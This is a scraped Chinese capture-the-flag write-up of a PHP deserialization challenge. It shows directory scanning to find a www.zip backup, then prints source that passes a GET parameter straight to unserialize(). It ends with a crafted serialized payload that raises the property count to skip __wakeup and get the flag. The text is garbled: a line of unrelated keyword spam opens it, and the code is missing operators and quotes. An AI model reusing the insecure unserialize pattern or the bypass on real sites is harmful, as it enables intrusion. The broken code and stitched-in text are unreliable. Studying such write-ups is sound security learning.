万网发布网站,建设银行国际互联网网站,网站由哪些部分组成部分,深圳最新新闻这个好玩 看到备份网站字眼#xff0c;用dirsearch扫描
在kali里打开
爆破出一个www.zip文件
访问一下 解压后是这个页面 class.php
?php
include flag.php; error_reporting(0); class Name{ private $username nonono; private $password yesyes; publi…
这个好玩 看到备份网站字眼用dirsearch扫描
在kali里打开
爆破出一个www.zip文件
访问一下 解压后是这个页面 class.php
?php
include flag.php; error_reporting(0); class Name{ private $username nonono; private $password yesyes; public function __construct($username,$password){ $this-username $username; $this-password $password; } function __wakeup(){ $this-username guest; } function __destruct(){ if ($this-password ! 100) { echo /brNO!!!hacker!!!/br; echo You name is: ; echo $this-username;echo /br; echo You password is: ; echo $this-password;echo /br; die(); } if ($this-username admin) { global $flag; echo $flag; }else{ echo /brhello my friend~~/brsorry i cant give you the flag!; die(); } } } ?
usernameadmin
password100
flag.php
?php $flag Syc{dog_dog_dog_dog}; ?
index.php
!DOCTYPE html head meta charsetUTF-8 titleI have a cat!/title link relstylesheet hrefhttps://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css link relstylesheet hrefstyle.css /head
style #login{ position: absolute; top: 50%; left:50%; margin: -150px 0 0 -150px; width: 300px; height: 300px; } h4{ font-size: 2em; margin: 0.67em 0; } /style body
div idworld div styletext-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 85%;left: 440px;font-family:KaiTi;因为每次猫猫都在我键盘上乱跳所以我有一个良好的备份网站的习惯 /div div styletext-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 80%;left: 700px;font-family:KaiTi;不愧是我 /div div styletext-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 70%;left: 640px;font-family:KaiTi; ?php include class.php; $select $_GET[select]; $resunserialize($select); ? /div div styleposition: absolute;bottom: 5%;width: 99%;p aligncenter stylefont:italic 15px Georgia,serif;color:white; Syclover cl4y/p/div /div script srchttp://cdnjs.cloudflare.com/ajax/libs/three.js/r70/three.min.js/script script srchttp://cdnjs.cloudflare.com/ajax/libs/gsap/1.16.1/TweenMax.min.js/script script srchttps://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/OrbitControls.js/script script srchttps://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/Cat.js/script script srcindex.js/script /body /html
index.php中有个注释
include class.php;提到了class.php $select $_GET[select];定义了一个存放GET请求方法的变量select
$resunserialize($select);将一个字符串反序列化为一个PHP变量 ?php
class Name{
private $username admin;
private $password 100;
}
$select new Name();
$res serialize($select);
echo $res
?
运行得到反序列化代码
O:4:Name:2:{s:14:Nameusername;s:5:admin;s:14:Namepassword;s:3:100;}
O:4:Name:3:{s:14:%00Name%00username;s:5:admin;s:14:%00Name%00password;s:3:100;}
